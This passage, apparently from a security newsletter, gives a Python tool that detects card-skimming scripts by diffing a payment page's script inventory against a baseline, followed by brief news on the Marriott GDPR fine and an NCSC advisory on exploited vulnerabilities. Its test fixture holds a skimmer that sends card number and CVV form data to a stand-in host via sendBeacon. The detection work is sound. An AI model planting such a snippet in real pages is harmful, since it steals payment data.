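<form id="payment"><input name="pan"><input name="cvv"></form>
<script>initCheckout({currency: "GBP"});</script>
</body></html>"""

SKIMMED_PAGE = """<html><head>
<script src="https://static.example-airline.test/js/checkout.js"></script>
<script src="https://cdn-metrics.test/modernizr.min.js"></script>
</head><body>
<form id="payment"><input name="pan"><input name="cvv"></form>
<script>initCheckout({currency: "GBP"});</script>
<script>document.getElementById("payment").addEventListener("submit", function (e) {
  navigator.sendBeacon("https://cdn-metrics.test/collect", new FormData(e.target));
});</script>
</body></html>"""


class ScriptInventory(HTMLParser):
    """Collect external script URLs and SHA-256 hashes of inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = set()
        self.inline = set()
        self._capturing = False
        self._chunks = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.add(src)
        else:
            self._capturing, self._chunks = True, []

    def handle_data(self, data):
        # HTMLParser hands script bodies through as data until </script>.
        if self._capturing:
            self._chunks.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._capturing:
            body = "".join(self._chunks).strip().encode()
            self.inline.add("sha256-" + hashlib.sha256(body).hexdigest())
            self._capturing = False


def inventory(html):
    parser = ScriptInventory()
    parser.feed(html)
    parser.close()
    return {"external": parser.external, "inline": parser.inline}


def diff_against_baseline(page_html, baseline):
    """Scripts present now but absent from the approved baseline, and vice versa."""
    now = inventory(page_html)
    return {
        "new_external": sorted(now["external"] - baseline["external"]),
        "new_inline": sorted(now["inline"] - baseline["inline"]),
        "missing": sorted((baseline["external"] - now["external"])
                          | (baseline["inline"] - now["inline"])),
    }


if __name__ == "__main__":
    approved = inventory(BASELINE_PAGE)
    print("clean page:", diff_against_baseline(BASELINE_PAGE, approved))
    print("skimmed page:", diff_against_baseline(SKIMMED_PAGE, approved))
```

Any non-empty "new_external" or "new_inline" on a payment page should page someone. The same inventory doubles as the input for a strict Content-Security-Policy (allow-listed script sources and hashes) and Subresource Integrity attributes, which stop the browser running an injected script in the first place rather than just reporting it after the fact.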

The ICO didn't hold back in dishing a massive DPA (GDPR) fine to the Marriott Hotels chain to the tune of £18.4m after a major data breach which affected up to 7 million UK guests. The ICO reported UK citizen names, contact information, and passport details were compromised in the cyber-attack. The ICO also said the company failed to put appropriate safeguards in place but acknowledged it had improved.

Meanwhile, the UK NCSC released an advisory which repeated an earlier United States warning that Chinese Threat Actors are exploiting well-known software vulnerabilities. The advisory details 25 top vulnerabilities that are being exploited whilst offering mitigation advice. Many of the vulnerabilities allow attackers to gain access to a victim’s network by exploiting products directly connected to the internet. The NSA has also produced a nice infographic breaking the 25 vulnerabilities down by threat.


Stay safe and secure.
